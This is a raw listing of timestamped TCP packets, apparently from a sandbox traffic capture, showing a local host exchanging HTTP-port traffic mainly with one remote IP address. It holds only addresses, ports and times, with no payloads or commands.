Apr 25, 2024 12:16:11.056178093 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.120800018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.120814085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.120942116 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.201185942 CEST	80	49734	185.172.128.76	192.168.2.4
Apr 25, 2024 12:16:11.259428978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.259473085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.259494066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.259568930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.259582996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.259589911 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.259612083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.259624958 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.259625912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.259668112 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.259669065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.259711981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.259713888 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.259737015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.259758949 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.259779930 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.259780884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.259794950 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.259830952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.259846926 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.259865999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.259881020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.259902000 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.259931087 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.259952068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.259964943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.260004997 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.260056973 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.260056973 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.260081053 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.260094881 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.260112047 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.260134935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.260137081 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.260149002 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.260170937 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.260171890 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.260211945 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.260216951 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.260248899 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.260273933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.260301113 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.260334015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.260346889 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.260360003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.260406971 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.260427952 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.261128902 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.261148930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.261189938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.261215925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.261226892 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.261243105 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.261248112 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.261261940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.261276007 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.261292934 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.261329889 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.261409998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.261465073 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.261498928 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.261558056 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.261768103 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.261801958 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.261821032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.261832952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.261884928 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.261884928 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.261903048 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.261971951 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.261977911 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.262010098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262022972 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262052059 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262064934 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262070894 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.262070894 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.262106895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262141943 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.262141943 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.262157917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262181997 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262200117 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.262259007 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.262628078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262640953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262670040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262682915 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262717009 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.262717009 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.262794971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262809038 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262835979 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.262852907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262861967 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.262866974 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262917995 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.262942076 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262953997 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262967110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.262996912 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.263019085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263036013 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.263089895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.263252020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263335943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263350010 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263402939 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.263411999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263434887 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263448000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263498068 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.263498068 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.263504028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263567924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263598919 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.263672113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263690948 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.263709068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263729095 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.263767958 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263782024 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.263782978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263808012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263827085 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.263854980 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263875008 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.263897896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263926983 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.263950109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.263993979 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.263993979 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264014006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264055967 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264059067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264074087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264120102 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264158964 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264173031 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264210939 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264245987 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264250040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264297009 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264297009 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264300108 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264343977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264364958 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264426947 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264430046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264444113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264487028 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264488935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264502048 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264538050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264542103 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264599085 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264599085 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264600992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264636040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264648914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264684916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264705896 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264705896 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264741898 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264755011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264755011 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264789104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264802933 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264858961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264872074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264889002 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264890909 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264903069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264930964 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264945030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264969110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.264986992 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264986992 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.264998913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265038967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265048981 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265048981 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265079021 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265093088 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265101910 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265137911 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265144110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265157938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265197992 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265197992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265212059 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265253067 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265253067 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265276909 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265341043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265355110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265373945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265374899 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265428066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265429974 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265429974 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265443087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265470982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265490055 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265496016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265544891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265549898 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265551090 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265589952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265610933 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265657902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265661001 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265748978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265763044 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265785933 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265794039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265819073 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265819073 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265844107 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265888929 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265927076 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.265935898 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265935898 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.265991926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266041040 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266041040 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266066074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266119957 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266163111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266170979 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266170979 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266216040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266218901 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266241074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266285896 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266285896 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266290903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266367912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266405106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266418934 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266441107 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266473055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266488075 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266488075 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266532898 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266565084 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266592979 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266633034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266649961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266664028 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266686916 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266711950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266714096 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266741037 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266776085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266807079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266827106 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266827106 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266850948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266887903 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266906977 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266906977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266974926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.266978979 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.266988993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267011881 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267025948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267057896 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.267057896 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.267066956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267102003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267151117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267188072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267193079 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.267193079 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.267234087 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.267311096 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267365932 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267379999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267384052 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.267394066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267436028 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.267457962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267503023 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.267508030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267522097 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267570019 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.267668009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267723083 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.267728090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267795086 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.267796040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267867088 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.267869949 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.267925978 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.267991066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268044949 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268057108 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.268095016 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.268131971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268189907 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.268213034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268270016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268306971 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.268321037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.268325090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268366098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268389940 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.268429041 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.268461943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268495083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268517017 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.268548965 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.268549919 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268563986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268605947 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.268636942 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268708944 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.268723011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268771887 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268810987 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.268831015 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.268863916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268920898 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:11.268929958 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268948078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268961906 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:11.268980026 CEST	49733	80	192.168.2.4	176.97.76.106
